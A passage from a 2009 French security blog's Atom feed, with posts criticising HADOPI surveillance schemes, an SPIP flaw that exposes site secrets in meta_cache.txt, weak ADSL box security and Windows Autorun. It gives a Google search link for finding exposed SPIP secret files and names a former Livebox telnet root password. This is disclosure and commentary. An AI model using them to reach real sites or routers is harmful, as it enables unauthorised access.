final&lt;/span&gt;. Cette solution résout les deux problèmes précédents. C'est un peu le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Cloud Computing&lt;/span&gt; appliqué à la cyber-surveillance :)&lt;/li&gt;&lt;/ol&gt;&lt;/div&gt;&lt;div&gt;La &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;solution &lt;/span&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;#2&lt;/span&gt; est moins coûteuse à mettre en place si le système de contrôle est implanté directement dans la fameuse "&lt;span class="Apple-style-span" style="font-style: italic;"&gt;box&lt;/span&gt;" &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Triple-Play&lt;/span&gt; que fournissent tous les FAI français. Et quoi qu'en dise &lt;a href="http://www.mail-archive.com/frnog@frnog.org/msg04355.html"&gt;Rani&lt;/a&gt;, peu de gens la remplacent par un modem standard, sous peine de perdre la téléphonie et la télévision. Ce dernier point est d'ailleurs assez surprenant, car il serait assez simple de prendre une carte ATM et d'y ajouter les couches logicielles "qui vont bien" (SIP, etc.) pour récupérer la fonctionnalité &lt;span class="Apple-style-span" style="font-style: italic;"&gt;Triple-Play&lt;/span&gt;. Ou de modifier une &lt;span class="Apple-style-span" style="font-style: italic;"&gt;box &lt;/span&gt;existante pour y intégrer un &lt;span class="Apple-style-span" style="font-style: italic;"&gt;firmware&lt;/span&gt; libre.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais la solution #2 est globalement inapplicable, car si elle se sait, tout le monde installera son modem ADSL de secours "spécial téléchargements".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;solution &lt;/span&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;#3&lt;/span&gt; est celle qui semble explorée par HADOPI. Elle présente de nombreux défis techniques qui me semblent impossibles à relever en l'état actuel.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le système de contrôle peut être &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;logiciel &lt;/span&gt;ou &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;matériel&lt;/span&gt;. Cette dernière solution n'est pas totalement aberrante techniquement, puisque des constructeurs intègrent déjà des solutions comme &lt;a href="http://www.computrace.fr/"&gt;CompuTrace&lt;/a&gt;, ou un &lt;a href="http://www.hyperspace.com/"&gt;deuxième système d'exploitation virtualisé&lt;/a&gt;, dans leur BIOS. Mais elle imposerait d'acheter un matériel agréé par l'Etat pour accéder à Internet, ce qui est délicat du point de vue de la concurrence ... sauf si les spécifications sont publiques et largement implémentées, ce qui ne va pas se faire en un jour (et probablement jamais).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et puis en 2009, on voit mal l'Etat distribuer un PC à chaque foyer comme on a pu distribuer des Minitel :) - d'autant qu'il n'existe plus aucun constructeur de matériel français.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enfin rien ne saurait empêcher un français d'acheter son matériel n'importe où dans la communauté européenne. Il faut donc partir du principe que le matériel connecté n'est pas maitrisé.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Une solution intermédiaire serait de disposer d'un matériel additionnel permettant le contrôle des usages sur tout PC standard. Pourquoi ne pas envisager un crypto-processeur intégré à la future &lt;a href="http://fr.wikipedia.org/wiki/Identité_nationale_électronique_sécurisée"&gt;carte d'identité électronique&lt;/a&gt; par exemple ? Les coréens (du Sud) le font bien pour &lt;a href="http://www.appscout.com/2009/04/comments_and_uploads_disappear.php"&gt;poster des commentaires sur YouTube&lt;/a&gt; (chacun ses problèmes). On peut aussi distribuer un &lt;a href="http://www.myglobull.fr/"&gt;Globull&lt;/a&gt; à chaque français, pour faire travailler l'industrie nationale :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Notons que le problème de l'authentification ne se pose pas vraiment, puisque le titulaire de la ligne est réputé responsable de toute activité Internet depuis celle-ci, sauf s'il apporte une preuve contraire. Il n'est donc pas nécessaire de déployer du 802.1x avec authentification par carte d'identité à l'échelle de l'Internet français :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En ce qui concerne l'idée d'un mouchard &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;logiciel&lt;/span&gt;, elle est vouée à l'échec pour plein de raisons, dont les principales sont: compatibilité et sécurité.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Tout d'abord des cris d'orfraie ont été entendus du côté de l'Open Source lorsqu'il a été question de fournir un mouchard compatible avec Windows uniquement. Mais il s'agit d'un combat d'arrière-garde, car le système qui va dépasser le PC sous Windows en terme d'unités connectées à Internet c'est ... le &lt;a href="http://arstechnica.com/old/content/2007/02/8885.ars"&gt;téléphone portable&lt;/a&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et là, entre Symbian, Windows Mobile, BlackBerry, Android et l'iPhone, cela devient un casse-tête logiciel, d'autant que la plupart de ces plate-formes sont "fermées" aux développements "bas niveau" principalement pour des raisons de ... DRM (notez l'ironie de la situation).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ensuite d'un point de vue de la &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;sécurité&lt;/span&gt;, l'idée d'un mouchard logiciel laisse rêveur. L'industrie informatique grand public ces 20 dernières années est partie de systèmes non sûrs pour les rendre non sécurisables. En gros, &lt;a href="http://www.sstic.org/SSTIC09/programme.do#RUFF"&gt;la sécurité est un échec&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Parmi les catastrophes qui pourraient advenir à ce mouchard logiciel, on peut citer le fait que sa sécurité soient contournée (ce qui lui enlèverait toute valeur probante), qu'il soit victime de bogues logiciels mettant en danger la machine sur laquelle il est installée (ça s'est déjà vu avec les &lt;a href="http://en.wikipedia.org/wiki/Witty_worm"&gt;antivirus&lt;/a&gt;), voire qu'il soit détourné de sa fonction première (le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;&lt;a href="http://fr.wikipedia.org/wiki/Rootkit#Rootkit_Sony-BMG"&gt;rootkit &lt;/a&gt;&lt;/span&gt;&lt;a href="http://fr.wikipedia.org/wiki/Rootkit#Rootkit_Sony-BMG"&gt;Sony&lt;/a&gt;, ça vous rappelle quelquechose ?).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et malgré tous les efforts de développement et de certification possibles (que ce soit &lt;a href="http://www.ssi.gouv.fr/fr/confiance/cspn-pres.html"&gt;CSPN&lt;/a&gt; ou &lt;a href="http://www.ssi.gouv.fr/fr/confiance/certificats.html"&gt;EAL&lt;/a&gt;), le &lt;a href="http://www.microsoft.com/whdc/devtools/wdk/default.mspx"&gt;WDK&lt;/a&gt; n'est pas écrit en ADA.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La catastrophe majeure serait que le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;backoffice &lt;/span&gt;de l'infrastructure soit compromis. C'est presque ce qui est arrivé au &lt;a href="https://secure.wikileaks.org/wiki/A_Blacklist_for_Websites_Backfires_in_Australia"&gt;gouvernement australien&lt;/a&gt;, qui avait mis en place un filtrage du Web.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;L'&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;informatique de confiance&lt;/span&gt; est une idée poursuivie par Microsoft depuis longtemps avec le projet Palladium. Bien que Microsoft soit probablement l'acteur le mieux placé pour influencer la sécurité de l'informatique personnelle, une &lt;span class="Apple-style-span" style="font-style: italic;"&gt;thread &lt;/span&gt;récente sur la liste &lt;a href="http://archives.neohapsis.com/archives/dailydave/2009-q2/0102.html"&gt;Daily Dave&lt;/a&gt; démontre encore que la bataille est loin d'être gagnée, et pas seulement pour des raisons techniques.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Microsoft est effectivement en position idéale pour rendre les services de filtrage attendus sur son propre système, entre &lt;a href="http://www.microsoft.com/windows/products/winfamily/defender/default.mspx"&gt;Windows Defender&lt;/a&gt; (qui pourrait bloquer tout logiciel de téléchargement grand public) et les listes noires intégrées au navigateur Internet Explorer 8. Mais pour des raisons d'image évidentes, je vois mal Microsoft activer une telle infrastructure au service du gouvernement français ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enfin se pose anecdotiquement le problème du &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;point de connexion&lt;/span&gt;. Je ne parle pas des cyber-cafés, car il est facile de les fermer administrativement, ou de leur imposer un système d'accès à Internet comme en Chine.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je parle de toutes les connexions qui ne sont pas de l'ADSL opéré par un FAI français. Cela inclut les abonnés AOL (dont les proxies Web ne sont pas en France), les utilisateurs de 3G+ (et bientôt 4G) d'un opérateur étranger en &lt;span class="Apple-style-span" style="font-style: italic; "&gt;roaming&lt;/span&gt;, les utilisateurs du service &lt;a href="http://www.fon.com/fr"&gt;FON&lt;/a&gt; ou &lt;a href="http://wifi.sfr.fr/"&gt;Neuf WiFi&lt;/a&gt;, voire d'un futur &lt;span class="Apple-style-span" style="font-style: italic; "&gt;mesh network&lt;/span&gt; WiMAX reprenant le concept de feu Paris Sans Fil.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voilà, je ne doute pas que les commentaires seront nombreux, mais tant qu'ils restent courtois et avisés je suis preneur :)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6574616402740859801?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6574616402740859801/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6574616402740859801' title='19 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6574616402740859801'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6574616402740859801'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/05/un-avis-dexpert-sur-hadopi.html' title='Un avis d&apos;expert sur HADOPI'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>19</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5036881617687070220</id><published>2009-04-07T21:10:00.002+02:00</published><updated>2009-04-07T21:31:13.847+02:00</updated><title type='text'>Rien n'est laissé au hasard</title><content type='html'>Ceux qui m'ont déjà lu ou entendu savent que je ne manque jamais une occasion de dire que "PHP est la pire régression pour la sécurité depuis 10 ans"(tm).&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Or un incident de sécurité est récemment survenu sur une installation de &lt;a href="http://www.spip.net/"&gt;SPIP&lt;/a&gt; dans un laboratoire du CNRS. Cet incident, fort bien analysé dans la &lt;span class="Apple-style-span" style="font-style: italic;"&gt;newsletter &lt;/span&gt;"&lt;a href="http://www.sg.cnrs.fr/FSD/securite-systemes/revues-pdf/si4.pdf"&gt;Sécurité de l'Information&lt;/a&gt;", pourrait en rester au stade de l'anecdote. Mais à y regarder de plus près, il s'agit d'un exemple flagrant qui vient habilement illustrer cette thèse.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Car le problème vient tout simplement du fait que &lt;span class="Apple-style-span" style="font-style: italic;"&gt;SPIP gère l'intégralité de sa configuration et des données de session dans un fichier texte à plat, accessible depuis la racine du serveur Web&lt;/span&gt;. On peut supposer que ce choix a été contraint techniquement par le manque de fonctionnalités des premières versions de l'interpréteur PHP ... je n'ose croire qu'il puisse s'agir d'un choix conscient et délibéré de la part des développeurs.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le fichier en question s'appelle &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;meta_cache.txt&lt;/span&gt;. Il est normalement protégé par un &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;.htaccess&lt;/span&gt;, qui pour plein de bonnes et de mauvaises raisons ne fait évidemment pas toujours son office, comme une rapide &lt;a href="http://www.google.com/search?q=inurl:meta_cache.txt"&gt;recherche Google&lt;/a&gt; permet de s'en rendre compte.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ce fichier contient une variable nommée &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;alea_ephemere&lt;/span&gt; qui s'avère essentielle pour la sécurité des opérations sur le site (les détails sont dans la &lt;span class="Apple-style-span" style="font-style: italic;"&gt;newsletter &lt;/span&gt;susmentionnée).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Accessoirement, ce fichier contient également une variable au nom intriguant: &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;secret_du_site&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Une rapide &lt;a href="http://doc.spip.org/@secret_du_site"&gt;recherche documentaire&lt;/a&gt; permet d'approcher (sans toutefois le comprendre) le rôle de cette variable:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/secret_du_site.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://newsoft.dyndns.org/blog/secret_du_site.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A la lecture de cette documentation, la première chose qui me vient en tête c'est cette &lt;a href="http://fr.wikipedia.org/wiki/Désigné_pour_mourir"&gt;merveille du 7ème art&lt;/a&gt; ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;PS. De source orale, SPIP émule également le mécanisme bien connu des &lt;/span&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;&lt;a href="http://fr.php.net/register_globals"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;register_globals&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; afin de contourner les configurations PHP un peu trop sécurisées.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-5036881617687070220?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/5036881617687070220/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=5036881617687070220' title='7 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5036881617687070220'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5036881617687070220'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/04/rien-nest-laisse-au-hasard.html' title='Rien n&apos;est laissé au hasard'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-7508160829474183074</id><published>2009-03-28T22:49:00.003+01:00</published><updated>2009-03-28T23:19:48.443+01:00</updated><title type='text'>Futurologie</title><content type='html'>En &lt;a href="http://www.ossir.org/jssi/jssi2006/supports/3B.pdf"&gt;2006&lt;/a&gt;, j'avais imaginé que les protocoles P2P puissent être utilisés comme canal de contrôle résilient par des botnets.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A l'époque, les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;bots&lt;/span&gt; rencontrés dans la nature utilisaient uniquement des connexions HTTP ou IRC vers un serveur statique comme canal de contrôle. Peu de temps après apparaissait le ver Nugache, présenté comme &lt;a href="http://www.schneier.com/blog/archives/2007/12/the_nugache_wor.html"&gt;révolutionnaire&lt;/a&gt; car basé sur un protocole P2P.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Cette même année &lt;a href="http://actes.sstic.org/SSTIC06/Securite_ADSL_en_France/SSTIC06-Ruff-Securite_ADSL_en_France.ppt"&gt;2006&lt;/a&gt;, j'avais présenté les risques liés à la monoculture dans le domaine des &lt;span class="Apple-style-span" style="font-style: italic;"&gt;boxes&lt;/span&gt; ADSL (ça ne s'est pas amélioré depuis, avec la concentration du secteur), leurs faiblesses de conception et d'implémentation. Avec une démo &lt;span class="Apple-style-span" style="font-style: italic;"&gt;live&lt;/span&gt; (pour ceux qui s'en souviennent)&lt;span class="Apple-style-span" style="font-style: italic;"&gt; &lt;/span&gt;d'insécurité flagrante liée aux interfaces d'administration exposées sur Internet. Pour planter le décor, la Livebox a pendant longtemps exposé sur Internet un serveur Telnet (sur un port non standard), et le mot de passe &lt;span class="Apple-style-span" style="font-style: italic;"&gt;root&lt;/span&gt; était &lt;span class="Apple-style-span" style="font-style: italic;"&gt;1234&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il semble qu'en 2009, &lt;a href="http://www.dronebl.org/blog/8"&gt;un ver&lt;/a&gt; se propage sur des routeurs grand public (Linksys, etc.) dans cette configuration.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bien sûr je ne peux pas me targuer d'avoir inventé le proxy Web (&lt;span class="Apple-style-span" style="font-style: italic;"&gt;private joke&lt;/span&gt;, désolé), mais voilà qui fait tout de même du bien à l'égo (et un &lt;span class="Apple-style-span" style="font-style: italic;"&gt;blog&lt;/span&gt; est fait pour ça :).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Cette année je m'apprête à prédire que la sécurité informatique va dans le mur à court ou moyen terme ... Je ne pense pas trop me tromper :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maintenant la véritable information.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dans &lt;a href="http://www.universfreebox.com/article7668.html"&gt;cette analyse&lt;/a&gt; du ver susmentionné, on peut lire:&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;blockquote&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;La Freebox est invulnérable face à cette attaque. Selon Free, il n’y a "aucune chance." ;)&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;div&gt;On peut lire &lt;a href="http://www.universfreebox.com/article7600.html"&gt;par ailleurs&lt;/a&gt; que la Freebox vient d'ajouter le support du protocole UPnP. Pour résumer l'historique de ce protocole:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Failles d'implémentation dans la plupart des modems/routeurs du marché &lt;a href="http://xforce.iss.net/xforce/xfdb/26707"&gt;[1]&lt;/a&gt; &lt;a href="http://secunia.com/advisories/search/?search=upnp"&gt;[2]&lt;/a&gt; &lt;a href="http://research.eeye.com/html/advisories/published/AD20060714.html"&gt;[3]&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://upnp.sourceforge.net/"&gt;Librairie&lt;/a&gt; Open Source non maintenue depuis 2006 (encore utilisée dans de nombreux modems/routeurs du marché).&lt;/li&gt;&lt;li&gt;Nouvelle librairie Open Source présentant un historique loin d'être vierge (notez le subtil "&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Bugfix for M-Search packet&lt;/span&gt;" &lt;a href="http://pupnp.sourceforge.net/ChangeLog"&gt;tout en bas&lt;/a&gt;).&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Ready ... set ... go !&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7508160829474183074?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7508160829474183074/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7508160829474183074' title='15 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7508160829474183074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7508160829474183074'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/03/futurologie.html' title='Futurologie'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>15</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1373584952336022275</id><published>2009-03-07T23:00:00.001+01:00</published><updated>2009-03-07T23:15:44.374+01:00</updated><title type='text'>Les gens ne lisent plus (ils jackent)</title><content type='html'>&lt;div&gt;J'ai découvert par hasard qu'il existait des rétroliens sur ce blog, malgré ma modeste &lt;a href="http://technorati.com/blogs/news0ft.blogspot.com"&gt;842,000ème&lt;/a&gt; place sur Technorati !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Parmi ceux-ci, un article sur &lt;a href="http://bugbrother.blog.lemonde.fr/2009/02/26/tout-ce-que-vous-avez-toujours-voulu-pirater-sans-jamais-savoir-comment-proceder/"&gt;les blogs du site LeMonde.fr&lt;/a&gt; (rien que ça !). Et bien figurez-vous que cela m'a apporté 60 visiteurs le jour de la publication, 30 le lendemain, et c'est tout. Ce qui est à peine visible sur le graphe Google Analytics:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/graphe_lemonde.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 717px; height: 129px;" src="http://newsoft.dyndns.org/blog/graphe_lemonde.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Alors qu'une &lt;a href="http://archives.neohapsis.com/archives/dailydave/2008-q3/0232.html"&gt;citation sur la liste "Daily Dave"&lt;/a&gt;, c'est du lourd ! (Environ x3 en audience sur la journée).&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/stats.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://newsoft.dyndns.org/blog/stats.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Parmi les rétroliens que j'ai découvert avec curiosité:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Le visiteur qui s'est perdu ici en utilisant &lt;a href="http://www.ethicle.com/"&gt;Ethicle&lt;/a&gt;, le moteur de recherche qui plante des arbres ...&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Le site &lt;a href="http://www.niouzes.org/"&gt;Niouzes&lt;/a&gt;, qui syndique le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;newsgroup&lt;/span&gt; "comp.os.linux" (trollomètre au taquet). J'ai le privilège d'y être cité au moins 2 fois [&lt;a href="http://www.niouzes.org/comp-os-linux-debats/134641-vista-sp1-2.html"&gt;1&lt;/a&gt;][&lt;a href="http://www.niouzes.org/comp-os-linux-debats/342266-linux-cest-genial-14.html"&gt;2&lt;/a&gt;]. Là où ça devient fort, c'est que la référence à &lt;a href="http://news0ft.blogspot.com/2008/12/la-haine.html"&gt;ma bâche sur \LaTeX&lt;/a&gt; ... est illisible à cause de l'encodage utilisé sur le site (UTF-8 probablement ;).&lt;/li&gt;&lt;li&gt;Enfin, le meilleur d'entre tous, le &lt;a href="http://jackjacking.blogspot.com/"&gt;site de Jacques&lt;/a&gt;, alias *Jack. Mythique.&lt;/li&gt;&lt;/ul&gt;Petit conseil à l'auteur: une recherche Google sur "&lt;a href="http://www.google.fr/search?q=*jacking"&gt;*jacking&lt;/a&gt;" devrait être une source inépuisable d'inspiration: &lt;a href="http://www.gnucitizen.org/blog/ad-jacking-xssing-for-fun-and-profit/"&gt;Ad-Jacking&lt;/a&gt;, &lt;a href="http://www.darknet.org.uk/2006/03/jacking-wifi-is-ok-say-ethics-expert/"&gt;WiFi-Jacking&lt;/a&gt; (à ne pas confondre avec le &lt;a href="http://www.techcrunch.com/2007/08/18/wiki-jacking/"&gt;Wiki-Jacking)&lt;/a&gt;, &lt;a href="http://www.gnucitizen.org/blog/call-jacking-phreaking-the-bt-home-hub/"&gt;Call-Jacking&lt;/a&gt;, &lt;a href="http://www.gnucitizen.org/blog/reconsidering-the-side-jacking-attack/"&gt;Side-Jacking&lt;/a&gt;, ... on a même eu droit au Lang-Jacking et au Chirac-Jacking, un moment :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;(Ok, je sors).&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1373584952336022275?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1373584952336022275/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1373584952336022275' title='4 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1373584952336022275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1373584952336022275'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/03/les-gens-ne-lisent-plus-ils-jackent.html' title='Les gens ne lisent plus (ils jackent)'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1728788376580672115</id><published>2009-02-13T18:00:00.000+01:00</published><updated>2009-02-13T18:00:03.230+01:00</updated><title type='text'>Random Rants Against Microsoft</title><content type='html'>&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;NoDriveTypeAutorun&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pour commencer, je pense qu'il n'a échappé à personne que le ver &lt;a href="http://fr.wikipedia.org/wiki/Conficker"&gt;Conficker&lt;/a&gt; utilise (entre autres) la fonction &lt;a href="http://en.wikipedia.org/wiki/AutoRun"&gt;Autorun&lt;/a&gt; de Windows (ainsi que la fonction &lt;a href="http://en.wikipedia.org/wiki/AutoPlay"&gt;Autoplay&lt;/a&gt; - qui n'est &lt;a href="http://cert.lexsi.com/weblog/index.php/2009/02/06/276-noms-de-domaine-de-conficker-downadup-a-et-b"&gt;pas du tout la même chose&lt;/a&gt;) pour se propager.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et là, &lt;a href="http://www.sstic.org/SSTIC09/programme.do"&gt;nouvel échec de l'industrie de la sécurité&lt;/a&gt;: l'&lt;a href="http://www.us-cert.gov/cas/techalerts/TA09-020A.html"&gt;US-CERT&lt;/a&gt; signale que la clé &lt;span class="Apple-style-span" style="font-weight: bold;"&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;NoDriveTypeAutorun&lt;/span&gt;&lt;/span&gt;, mentionnée dans tous les guides de sécurisation Windows depuis plusieurs années, est &lt;span class="Apple-style-span" style="font-style: italic;"&gt;grosso modo&lt;/span&gt; sans effet. Ce qui signifie qu'aucun des auteurs de ces guides de sécurisation n'a testé sa recommandation sur sa propre machine ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Un &lt;a href="http://support.microsoft.com/kb/953252"&gt;patch&lt;/a&gt; est disponible sur le site de Microsoft, mais il doit être installé manuellement par l'utilisateur (pas de &lt;a href="http://update.microsoft.com/"&gt;Windows Update&lt;/a&gt;). Et ce patch a été poussé silencieusement dans Windows Vista et 2008 avec &lt;a 